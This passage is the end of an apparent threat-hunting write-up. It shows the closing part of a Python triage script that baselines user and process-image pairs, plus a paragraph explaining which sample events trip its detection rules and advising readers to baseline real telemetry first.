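    return findings


def baseline(events):
    """Count (user, image) pairs: the 'what is normal here' view the talk recommends."""
    return Counter((e.user, e.image) for e in events)


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for f in triage(evs):
        print(f"[{f['rule']}] {f['host']} {f['user']}: {f['cmdline']}")
    for (user, image), n in sorted(baseline(evs).items()):
        print(f"baseline {user} -> {image}: {n}")
```

On the sample data the benign certutil verify, the local shell32.dll rundll32 call and the curl to the internal artifact host produce no findings, while the other six events each trip exactly one rule. The `baseline` counter is the part to run over weeks of real telemetry first, so the allowlist and the parent/image expectations in the rules reflect what your own environment actually does rather than a generic list.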